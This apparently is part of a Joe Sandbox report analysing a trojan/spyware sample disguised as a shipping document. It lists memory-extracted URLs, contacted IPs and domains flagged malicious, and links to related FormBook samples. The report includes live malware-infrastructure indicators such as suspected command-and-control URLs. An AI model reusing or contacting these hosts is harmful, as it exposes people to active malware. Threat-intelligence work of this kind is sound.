                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111842165995.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121333505679.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.hasthosting.xyzAhEyCWkdTLz.exe, 00000005.00000002.874124663.0000000000B59000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111650528174.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.jsAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&amp;reg_source=parking_autoAtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.jsAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_landAtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://00808.vip/AtBroker.exe, 00000004.00000002.874304385.0000000002BE4000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003784000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.436603581.0000000001284000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://www.sqlite.org/copyright.html.AtBroker.exe, 00000004.00000002.874829576.0000000061EBE000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drfalse
                                                                                    high
                                                                                    http://www.hasthosting.xyz/04fb/?mFptYb=EDSq5eKeQ/ynAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000004F12000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121118333732.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.pngAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111554188180.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121337456585.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drfalse
                                                                                      high
                                                                                      https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281756134546.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111316162395.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchAtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drfalse
                                                                                        high
                                                                                        https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.pngAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpegAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.pngAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121050155085.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.google.com/favicon.ico1453h-8L.4.drfalse
                                                                                            high
                                                                                            https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111532064388.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://ac.ecosia.org/autocomplete?q=AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drfalse
                                                                                              high
                                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281533072611.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.pngAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.cssAhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121427539351.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.kghjkx.xyz/usop/?mFptYb=3GbX3siKa3fb4xoywmO7dLt2gtHeawz6Sbk2xDjabsziN9g8eu79XBc6hQhNCIiJAtBroker.exe, 00000004.00000002.874304385.0000000003A06000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.00000000045A6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.pngAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111820293498.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121114111017.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.pngAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.reg.ru/sozdanie-saita/AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.cssAtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281606448510.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_hAtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121352209002.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.cssAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drfalse
                                                                                                    high
                                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.cssAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.pngAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drfalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      45.33.6.223
                                                                                                      www.sqlite.orgUnited States
                                                                                                      63949LINODE-APLinodeLLCUSfalse
                                                                                                      38.47.237.27
                                                                                                      iuyi542.xyzUnited States
                                                                                                      174COGENT-174UStrue
                                                                                                      185.27.134.144
                                                                                                      www.hasthosting.xyzUnited Kingdom
                                                                                                      34119WILDCARD-ASWildcardUKLimitedGBtrue
                                                                                                      38.88.82.56
                                                                                                      www.college-help.infoUnited States
                                                                                                      174COGENT-174UStrue
                                                                                                      154.23.184.95
                                                                                                      wcp95.topUnited States
                                                                                                      174COGENT-174UStrue
                                                                                                      156.234.28.94
                                                                                                      www.jllllbx.topSeychelles
                                                                                                      136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                                                      142.250.185.115
                                                                                                      ghs.google.comUnited States
                                                                                                      15169GOOGLEUSfalse
                                                                                                      15.197.148.33
                                                                                                      binacamasala.comUnited States
                                                                                                      7430TANDEMUStrue
                                                                                                      67.223.117.142
                                                                                                      www.flikka.siteUnited States
                                                                                                      15189VIMRO-AS15189UStrue
                                                                                                      104.21.14.183
                                                                                                      www.yvrkp.topUnited States
                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                      206.119.81.36
                                                                                                      neg21.topUnited States
                                                                                                      174COGENT-174UStrue
                                                                                                      194.58.112.174
                                                                                                      www.marketplacer.topRussian Federation
                                                                                                      197695AS-REGRUtrue
                                                                                                      3.33.130.190
                                                                                                      loginov.enterprisesUnited States
                                                                                                      8987AMAZONEXPANSIONGBtrue
                                                                                                      47.129.103.185
                                                                                                      www.kghjkx.xyzCanada
                                                                                                      34533ESAMARA-ASRUtrue
                                                                                                      113.20.119.31
                                                                                                      dns.webcake.ioViet Nam
                                                                                                      45903CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVNfalse
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1550932
                                                                                                      Start date and time:2024-11-07 10:48:53 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 10m 14s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                      Number of analysed new started processes analysed:8
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:2
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:SHIPPING DOC_20241107.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/6@17/15
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 66.7%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 94%
                                                                                                      • Number of executed functions: 45
                                                                                                      • Number of non-executed functions: 275
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                                                      • Execution Graph export aborted for target AhEyCWkdTLz.exe, PID 1648 because it is empty
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: SHIPPING DOC_20241107.exe
                                                                                                      TimeTypeDescription
                                                                                                      04:50:05API Interceptor91648x Sleep call for process: AhEyCWkdTLz.exe modified
                                                                                                      04:50:09API Interceptor11460407x Sleep call for process: AtBroker.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      45.33.6.223Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
                                                                                                      SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                      • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                                                                                                      IND24072113.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                                                      ekte.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                                                      IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                                                                      SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                      • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                                                                      New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                      • www.sqlite.org/2019/sqlite-dll-win32-x86-3280000.zip
                                                                                                      BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                                                                                                      FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                                                                      • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                                                                                                      SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                                                                      • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                                                      38.47.237.27DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                        DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                          185.27.134.144http://outlook-accede-aqui.iceiy.com/Get hashmaliciousUnknownBrowse
                                                                                                          • outlook-accede-aqui.iceiy.com/jquery.min.js
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          www.jllllbx.topINVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 156.234.28.94
                                                                                                          HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 156.234.28.94
                                                                                                          OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 156.234.28.94
                                                                                                          www.college-help.infoSecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 38.88.82.56
                                                                                                          NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 38.88.82.56
                                                                                                          18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 38.88.82.56
                                                                                                          WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 38.88.82.56
                                                                                                          PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                          • 38.88.82.56
                                                                                                          dns.webcake.iohttps://pagina.pro/Iraq2024ewGet hashmaliciousUnknownBrowse
                                                                                                          • 203.205.10.134
                                                                                                          http://www.open-sora.orgGet hashmaliciousExela Stealer, Growtopia, Python StealerBrowse
                                                                                                          • 203.205.10.134
                                                                                                          Versanddetails.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 113.20.119.61
                                                                                                          Versanddetails.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 113.20.119.61
                                                                                                          pagamento.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 113.20.119.61
                                                                                                          Original Shipment Document.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 113.20.119.61
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          WILDCARD-ASWildcardUKLimitedGBhttps://downloadourauthfile-list.thsite.top/?em=EU-Sales-Support@scanlab.deGet hashmaliciousUnknownBrowse
                                                                                                          • 185.27.134.155
                                                                                                          http://appealaccountreporte.rf.gd/?i=1Get hashmaliciousUnknownBrowse
                                                                                                          • 185.27.134.215
                                                                                                          kingdom.ps1Get hashmaliciousAtlantida StealerBrowse
                                                                                                          • 31.22.4.235
                                                                                                          VM2ICvV5qQ.pdfGet hashmaliciousUnknownBrowse
                                                                                                          • 185.27.134.114
                                                                                                          http://growthsparkplus.thsite.top/?email=anna@cellnextelecom.comGet hashmaliciousUnknownBrowse
                                                                                                          • 185.27.134.108
                                                                                                          la.bot.arm-20241006-1050.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 82.163.179.172
